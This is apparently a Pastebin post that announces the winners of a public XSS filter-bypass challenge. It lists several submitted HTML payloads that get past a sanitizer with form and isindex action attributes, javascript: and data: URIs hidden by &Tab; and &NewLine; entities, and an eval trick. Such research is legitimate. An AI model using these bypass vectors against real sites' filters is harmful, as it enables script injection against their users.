SHARE
TWEET

1st, 2nd and 3rd Position XSS Vectors

a guest Apr 16th, 2013 1,754 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Yesterday I have tweeted about the winner of XSS Challenge (http://demo.chm-software.com/xssfilter/) and down below you will find some more "awesome vectors submitted by different researchers" that got second, third position and so on ... The challenge is up and running and if you will find something new ... let me know (@soaj1664ashar). You will get something in the form of prize :-)
  2.  
  3. 1st Position vector by a great person @avlidienbrunn and the vector is:
  4. -------------------------------------------------------
  5. <isindex action="javas&Tab;cript:alert(1)" type=image>
  6. and here is the example fiddle: http://jsfiddle.net/X7hdq/
  7.  
  8. I have already tweeted about that here: https://twitter.com/soaj1664ashar/status/323847687755665409
  9.  
  10. 2nd Position vectors submitted by an XSS Guru i.e., Mario (@0x6D6172696F).
  11. ---------------------------------------------------------------------
  12. In-fact Mario has sent me TWO vectors and they are:
  13.  
  14. a) <form action='data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt'><button>CLICK
  15. here is the example fiddle for this: http://jsfiddle.net/6DTSp/
  16.  
  17. b) <form action='java&Tab;scri&Tab;pt:alert(1)'><button>CLICK
  18. here is the working fiddle of this vector: http://jsfiddle.net/dPrHG/
  19.  
  20. 3rd Position vector submitted by cool guy i.e., @secalert
  21. --------------------------------------------------------
  22.  
  23. <form id="myform" value=""
  24. action=javascript&Tab;:eval(document.getElementById('myform').elements[0].value)><textarea>alert(1)</textarea><input
  25. type="submit" value="Absenden"></form>
  26.  
  27. and here is the running fiddle: http://jsfiddle.net/HMH9k/
  28.  
  29. and in `NO` particular order ... I have also received the following VALID vectors from awesome PWNERS :)
  30. ---------------------------------------------------------------------------------------------------------
  31.  
  32. <isindex action=http://jkuskos.com/malfiles/jdk.html type=image> by @JohnathanKuskos
  33.  
  34. <form action="&Tab;javas&Tab;cript&Tab;:alert('bypass :)')"
  35. autocomplete="on">
  36. First name:<input type="text" name="fname"><br>
  37. <input type="submit">
  38. </form>            by @insertScript
  39.  
  40. <form action=javascript&NewLine;:alert(7)><input type=submit> by @Milad_Bahari
  41.  
  42. <form action="javas&Tab;cript:alert(1)" method="get">
  43.   <input type="submit" value="Submit">
  44. </form>                               by @_hlipinski
  45.  
  46. FYI, I hope the above vectors will not work now .... :) #figureoutyourself
  47. At the same time ... I have also the biggest POOL of XSS vectors that people use here and there to break different filters. I will write in detail about that data in near future. This post is just to show the awesome vectors that are able to bypass the filter. I hope you guys have learn something and I have learnt a lot. I had also seen your "frustration" in the LOGS and it is really fun to watch logs :-). The challenge is online. Keep trying and figure out how you can break the filter.
  48.  
  49. Stay Blessed!
  50.  
  51. @soaj1664ashar
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top